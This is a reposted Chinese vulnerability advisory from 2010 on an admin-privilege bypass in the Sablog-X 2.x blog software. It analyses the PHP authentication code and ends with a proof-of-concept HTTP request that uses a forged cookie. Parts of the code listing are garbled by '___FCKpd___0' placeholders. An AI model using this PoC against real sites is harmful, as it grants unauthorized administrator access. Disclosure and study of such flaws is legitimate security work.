首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Sablog-X 2.X 后台管理权限欺骗漏洞
来源:http://www.80vul.com 作者:Ryat 发布时间:2010-02-25  
Sablog-X 2.X 后台管理权限欺骗漏洞

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
data: 2010/2/24

一 描叙:

由于Sablog-x v2.x的后台认证过程存在严重的逻辑问题,导致构造特殊的cookie直接登录后台。

二 分析 :

// cp.php

if (!$sax_uid || !$sax_pw || !$sax_logincount || !$sax_hash) {
// 只要这个条件不满足,就可以通过后台的权限验证了
	loginpage();
}
...
if ($sax_group == 1) {
// 如果要获得管理员权限,还必须保证$sax_group的值为1
...


下面来看下这几个变量是怎么来的


// common.inc.php

list($sax_uid, $sax_pw, $sax_logincount) = 
___FCKpd___0
COOKIE['sax_auth'] ? explode("\t", authcode(
___FCKpd___0
COOKIE['sax_auth'], 'DECODE')) : array('', '', ''); // authcode()就是简单的调用base64_decode $sax_hash = sax_addslashes(
___FCKpd___0
COOKIE['sax_hash']); // 这些变量来自
___FCKpd___0
COOKIE,是可以控制的:) // 不过后面的代码在一定条件下会通过extract(
___FCKpd___0
EVO)来重新注册这些变量 $sax_uid = intval($sax_uid); $sax_pw = sax_addslashes($sax_pw); $sax_logincount = intval($sax_logincount); $sax_group = 4; // 默认的值为4,而我们需要的值是1
___FCKpd___0
EVO = array(); // 这里是fix那个变量覆盖的漏洞:) $seccode = $sessionexists = 0; $userfields = 'u.userid AS sax_uid, u.username AS sax_user, u.password AS sax_pw, u.groupid AS sax_group, u.logincount AS sax_logincount, u.email as sax_email, u.url as sax_url, u.lastpost, u.lastip, u.lastvisit, u.lastactivity'; // 这里定义的字段包括sax_user、sax_pw、sax_group、sax_logincount,这些都是后台权限验证时要用到的 if ($sax_hash) { if ($sax_uid && $sax_pw) { // 流程[1] // 这里会查询sax_group,但如果我们想让查询出的值为1[也就是说查询出管理员的信息],就必须知道管理员的sax_hash、sax_pw、sax_logincount等多个值 $query = $DB->query("SELECT s.hash, s.seccode, $userfields FROM {$db_prefix}users u LEFT JOIN {$db_prefix}sessions s ON (s.uid = u.userid) WHERE s.hash='$sax_hash' AND u.userid='$sax_uid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND u.password='$sax_pw' AND u.logincount='$sax_logincount' AND s.auth_key='$sax_auth_key'"); } else { $query = $DB->query("SELECT hash,uid as sessionuid,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip' LIMIT 1"); // 流程[2] // 如果我们知道管理员的sax_hash和onlineip,就可以使下面的
___FCKpd___0
EVO['sessionuid']的值为管理员的id } if (
___FCKpd___0
EVO = $DB->fetch_array($query)){ $sessionexists = 1; if(
___FCKpd___0
EVO['sessionuid']) { // 流程[3] $query = $DB->query("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='".intval(
___FCKpd___0
EVO['sessionuid'])."'");
___FCKpd___0
EVO = array_merge(
___FCKpd___0
EVO, $DB->fetch_array($query)); // 这里查询的数据会合并到
___FCKpd___0
EVO,而我们只要能控制
___FCKpd___0
EVO['sessionuid']的值为1[假设我们要查询的管理员id为1],就可以查询出正确的管理员信息,这样就可以保证sax_group的值为1了 $sax_uid =
___FCKpd___0
EVO['userid']; } } else { if(
___FCKpd___0
EVO = $DB->fetch_one_array("SELECT hash,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'")) { dcookies(); $sessionexists = 1; } } } ...... @extract(
___FCKpd___0
EVO); 由上面的代码可以看到,如果我们知道session表中uid为1的数据的sax_hash和onlineip,通过流程[2][3]就可以查询出正确的管理员信息,再通过extract(
___FCKpd___0
EVO)注册变量,就可以通过后台的验证,获得管理员权限了:) 那么我们如何知道正确的sax_hash和onlineip呢? // global.func.php function updatesession() { ... replacesession(1); ... } function replacesession($insert = 0) { ... $ips = explode('.', $onlineip); ... $DB->query("INSERT INTO {$db_prefix}sessions (hash, auth_key, ip1, ip2, ip3, ip4, uid, groupid, lastactivity, seccode, is_robot) VALUES ('$sax_hash', '$sax_auth_key', '$ips[0]', '$ips[1]', '$ips[2]', '$ips[3]', '$sax_uid', '$sax_group', '$timestamp', '$seccode', '".IS_ROBOT."')"); ... replacesession()函数为我们提供帮助,因为$sax_hash、$sax_uid、$onlineip这些变量是可以控制的,所以我们可以向session表中出入一条uid为1的数据:) 首先我们使$sax_uid为1,$sax_pw为空,这样就会跳过流程[1]执行流程[2],这时我们的sax_hash和onlineip在session表中并不存在,所以流程[3]不会执行,通过extract(
___FCKpd___0
EVO)注册变量时也不会重新注册$sax_uid、$sax_hash和$onlineip,这样我们就可以通过updatesession()函数向session表中插入一条uid为1同时sax_hash和onlineip也是我们知道的数据了 然后我们重新执行上面的过程,因为这时session表里已经有了我们需要的数据了,流程[3]将被执行,user表中uid为1的管理员数据将被查询出并合并到
___FCKpd___0
EVO,并通过extract()重新注册变量[$sax_group的值将被重新注册为1],这样我们就可以通过后台权限验证,并获得管理员权限了:) 三 利用 : PoC: GET /cp.php HTTP/1.1; Host: 127.0.0.1 Connection: Close Cookie: sax_auth=MQkJ;sax_hash=abcdef; 四 补丁[fix]: 缺

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·远程包含和本地包含漏洞的原理
·搜狗浏览器“页面欺骗”漏洞
·Sablog-X v2.x 任意变量覆盖漏洞
·鼎峰企业智能建站系统注入搜索注
·快客电邮(QuarkMail)最新远程
·MASA2EL Music City v1.0远程注
·Phpwind7.5 后台本地包含漏洞利
·科讯 v6.5 CMS Oday
·Discuz!7.0-7.2后台settings.inc
·网页编辑器漏洞手册(全面版)
·新云4.0注册上传漏洞
·Discuz插件《虚拟股市》blind In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved